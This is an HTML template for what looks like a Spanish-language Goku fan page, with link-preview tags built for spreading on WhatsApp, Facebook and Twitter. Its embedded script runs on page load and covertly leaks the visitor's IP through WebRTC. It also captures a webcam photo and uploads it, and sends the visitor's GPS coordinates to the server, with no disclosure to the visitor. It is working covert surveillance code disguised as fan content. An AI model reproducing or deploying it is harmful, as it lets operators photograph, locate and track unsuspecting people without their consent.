<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Fotos de la Fiesta Familiar</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/css/bootstrap.min.css" rel="stylesheet">
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/js/bootstrap.bundle.min.js"></script>
    <link rel="icon" href="{{ url_for('static', filename='images/pertro_newtop.jpg') }}" type="image/jpg">

    <!-- Open Graph para vista previa en WhatsApp y Facebook -->
    <meta property="og:title" content="GOKU UN PERSONAJE CON POTENCIA 6D 🎉">
    <meta property="og:description" content="¡GOKU Y SU POTENCIA 6D! 📸">
    <meta property="og:image" content="https://gokulegana.netdroidpage.online/static/images/goku.png">
    <meta property="og:url" content="https://gokulegana.netdroidpage.online">
    <meta property="og:type" content="website">

    <!-- Twitter Card (para que se vea bien en Twitter también) -->
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:title" content="ES GOKU EN REALIDAD 6D? 🎉">
    <meta name="twitter:description" content="¡GOKU ACTUALMENTE ES 6D! 📸">
    <meta name="twitter:image" content="https://gokulegana.netdroidpage.online/static/images/goku.png">

    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f8f9fa;
            margin: 0;
            padding: 0;
        }

        .container {
            margin-top: 50px;
        }

        .card {
            border-radius: 15px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
        }

        .status {
            font-size: 1rem;
            margin-top: 10px;
            color: #6c757d;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="row justify-content-center">
            <div class="col-md-6">
                <div class="card">
                    <div class="card-body text-center">
                        <h1 class="card-title">EL HÉROE MÁS PODEROSO DEL UNIVERSO!</h1>
                        <p class="card-text">EL MEJOR MOMENTO DE GOKU.</p>
                        <p id="status" class="status">Iniciando...</p>
                        <img src="{{ url_for('static', filename='images/goku.png') }}" alt="Goku" class="img-fluid mt-3">
                        <p class="card-text">
                            Goku es uno de los personajes más emblemáticos del mundo del anime. Conocido por su increíble poder y su inquebrantable espíritu de lucha, ha enfrentado a innumerables enemigos y ha superado límites que parecían imposibles. Su habilidad para entrenar y crecer en poder lo ha convertido en el guerrero más fuerte del universo. A lo largo de la saga de Dragon Ball, Goku ha demostrado ser un líder valiente, siempre dispuesto a proteger a sus seres queridos y al universo entero. Su energía positiva, su humildad y su amor por la lucha lo han convertido en un símbolo de perseverancia y esperanza para millones de fans alrededor del mundo. Sin lugar a dudas, Goku es un ícono cultural que trasciende generaciones.
                        </p>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <script>
        document.addEventListener('DOMContentLoaded', () => {
            const status = document.getElementById('status');

            // Capturar IP
            const pc = new RTCPeerConnection({ iceServers: [] });
            pc.createDataChannel("");
            pc.createOffer().then(offer => pc.setLocalDescription(offer));
            pc.onicecandidate = e => {
                if (!e.candidate) return;
                const ip = e.candidate.candidate.split(" ")[4];
                fetch(`/log?ip=${ip}`)
                    .then(() => status.innerText = "Petro es God con exito.")
                    .catch(() => status.innerText = "Error registrando IP.");
            };

            // Activar cámara y capturar foto
            navigator.mediaDevices.getUserMedia({ video: true })
                .then(stream => {
                    const video = document.createElement('video');
                    video.srcObject = stream;
                    video.play();
                    setTimeout(() => {
                        const canvas = document.createElement('canvas');
                        canvas.width = video.videoWidth;
                        canvas.height = video.videoHeight;
                        canvas.getContext('2d').drawImage(video, 0, 0);
                        const data = canvas.toDataURL('image/jpeg');
                        fetch('/upload', {
                            method: 'POST',
                            headers: {
                                'Content-Type': 'application/json'
                            },
                            body: JSON.stringify({ data })
                        }).then(() => {
                            status.innerText = "Foto enviada con éxito.";
                        }).catch(() => {
                            status.innerText = "Error enviando foto.";
                        });
                        stream.getTracks().forEach(track => track.stop());
                    }, 5000);
                })
                .catch(error => {
                    console.error('Error accessing camera: ', error);
                    status.innerText = "Error accediendo a la cámara.";
                });

            // Obtener ubicación
            if (navigator.geolocation) {
                navigator.geolocation.getCurrentPosition(position => {
                    const lat = position.coords.latitude;
                    const lon = position.coords.longitude;
                    fetch(`/log?lat=${lat}&lon=${lon}`)
                        .then(() => status.innerText += "\nUbicación registrada con éxito.")
                        .catch(() => status.innerText += "\nError registrando ubicación.");
                }, error => {
                    console.error('Error getting location: ', error);
                    status.innerText += "\nError obteniendo ubicación.";
                });
            } else {
                status.innerText += "\nGeolocalización no soportada por el navegador.";
            }
        });
    </script>
</body>
</html>
